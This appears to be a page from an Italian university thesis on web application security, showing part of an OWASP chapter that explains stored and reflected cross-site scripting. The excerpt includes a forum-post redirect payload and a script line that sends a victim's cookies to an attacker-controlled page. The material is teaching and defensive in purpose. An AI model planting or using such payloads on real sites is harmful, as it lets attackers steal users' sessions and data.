analisi e gestione della sicurezza di una complessa applicazione ...

More documents

Recommendations

Info

CAPITOLO VI - Gli attacchi e il progetto OWASP Quando il client lo esegue fornisce delle informazioni all’hacker che non avrebbe dovuto dare. La web application è colpevole in quanto vulnerabile e consegna lo script dell’hacker al client; l’attacco funziona anche in assenza di vulnerabilità del browser e dei sistemi operativi di client e server. Come esempio si può provare a scrivere su un forum nel testo: location=‘http://www.notrace.it/’; Successivamente si può salvare questo testo su un forum non protetto da questo attacco e come risultato si avrà che chi carica la pagina con il messaggio, sarà reindirizzato al sito www.notrace.it Vediamo un esempio più pericoloso con questo testo: document.location=‘http://www.sito.com/leggo- cookie.asp?’+document.cookie Con questa riga si possono leggere i cookie rilasciati dal sito vittima e inviarli ad una pagina appositamente creata. La prima domanda che salta in mente allo sviluppatore riguarda la sicurezza degli script. Non erano forse stati pensati per essere intrinsecamente sicuri? È noto che gli script possono accedere ad un numero limitato di risorse e che il browser impedisce loro, tra le altre cose, di accedere ad un arbitrario file su disco o di eseguire chiamate di sistema. Il fatto è che gli script possono essere considerati sicuri in quanto eseguiti nel contesto dell’applicazione web per cui sono stati scritti. Non è certamente di interesse per un sito divulgare le informazioni sensibili che gli sono state affidate dall’utente; diverso è se lo script è pensato da qualcuno che vuole rubare queste informazioni. Rivalutando gli script in quest’ottica, ecco che le risorse a cui devono poter accedere possono risultare a rischio; tra queste ci possono essere i dati presenti nella pagina web del sito vulnerabile, i dati prelevabili con richieste Get/Post/XmlHttp al sito di provenienza, i cookie persistenti o ancora dei dati XML usati per esempio da Ajax. Descritto il meccanismo a grandi linee, entriamo in maggiore dettaglio cominciando a suddividere gli attacchi di cross site scripting in due macrocategorie: attacchi stored e 136
CAPITOLO VI - Gli attacchi e il progetto OWASP attacchi reflected. I primi si verificano quando il codice nocivo è conservato dall’applicazione stessa e viene presentato all’utente ogni qualvolta si accede ad una specifica pagina (es: un messaggio, all’interno di un forum, che contiene JavaScript). Nella seconda categoria rientrano quegli attacchi che utilizzano altri canali di comunicazione (es: email, messaggi attraverso IM client e così via) per trasmettere un link "modificato", il quale reindirizzerà il codice verso l’utente. Uno degli attacchi di cross site scripting più diffusi inizia con un attacco di social engineering che ha come mezzo una apparentemente innocua email che promette una vincita milionaria sicura. In mezzo alle milioni di email di spam che girano su internet, molte sono un attacco di cross site scripting. Credo che nessuno possa negare che tragicamente non sarebbero pochi gli utenti a cliccare sul link per cercare di riscuotere la presunta vincita milionaria. Figura 69 Esempio di attacco di “ cross site scripting” Al click dell’utente si apre, ad esempio, il sito della banca che l’hacker ha prescelto in quanto vulnerabile al cross site scripting e di cui presume che l’utente ne sia un cliente. Il risultato è l’apertura del browser che non desta alcun sospetto all’utente che brama la vincita fortunata. A 137
Page 1 and 2:
UNIVERSITÀ POLITECNICA DELLE MARCH
Page 3 and 4:
INDICE INDICE .....................
Page 5 and 6:
ELENCO DELLE FIGURE Figura 1 Home p
Page 7 and 8:
CAPITOLO I - Introduzione 5
Page 9 and 10:
CAPITOLO I - Introduzione tecniche
Page 11 and 12:
CAPITOLO I - Introduzione 2 Gestion
Page 13 and 14:
CAPITOLO II - Talete: Autenticazion
Page 15 and 16:
Page 17 and 18:
Page 19 and 20:
Page 21 and 22:
Page 23 and 24:
• Ampliamento della superficie di
Page 25 and 26:
Page 27 and 28:
Page 29 and 30:
Page 31 and 32:
Page 33 and 34:
Page 35 and 36:
2.4.5 Diagramma delle classi CAPITO
Page 37 and 38:
Page 39 and 40:
Page 41 and 42:
Page 43 and 44:
CAPITOLO III - Progettare un’appl
Page 45 and 46:
3.2 Il significato dei design patte
Page 47 and 48:
Page 49 and 50:
Page 51 and 52:
Page 53 and 54:
Page 55 and 56:
4.1 Introduzione CAPITOLO IV - La s
Page 57 and 58:
CAPITOLO IV - La sicurezza nelle we
Page 59 and 60:
Page 61 and 62:
Page 63 and 64:
Page 65 and 66:
Page 67 and 68:
Page 69 and 70:
Page 71 and 72:
Page 73 and 74:
Page 75 and 76:
Page 77 and 78:
Page 79 and 80:
Page 81 and 82:
Page 83 and 84:
Page 85 and 86:
Page 87 and 88: Mentre con AnomynousTemplate si ha:
Page 89 and 90: CAPITOLO IV - La sicurezza nelle we
Page 95 and 96: CAPITOLO V - La sicurezza nell’ar
Page 105 and 106: 1 porsi dalla prospettiva dell’at
Page 113 and 114: CAPITOLO VI - Gli attacchi e il pro
Page 115 and 116: 6.1 Progetto OWASP CAPITOLO VI - Gl
Page 125 and 126: 6.2.5 I vantaggi nascosti CAPITOLO
Page 137: CAPITOLO VI - Gli attacchi e il pro
Page 149 and 150: 6.10 Denial of Service CAPITOLO VI
Page 151 and 152: 6.11 Insecure Configuration Managem
Page 153 and 154: CAPITOLO VII - Test per valutare la
Page 155 and 156: 7.1.1 Analisi del codice sorgente C
Page 163 and 164: vulnerabilità critiche di applicaz
Page 165 and 166: • Aggiungere la tecnologia SSL e
Page 167 and 168: Durante questi anni universitari so
Page 169 and 170: M. Fowler, D. Rice, M. Foemmel, E.
show all

analisi e gestione della sicurezza di una complessa applicazione ...

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?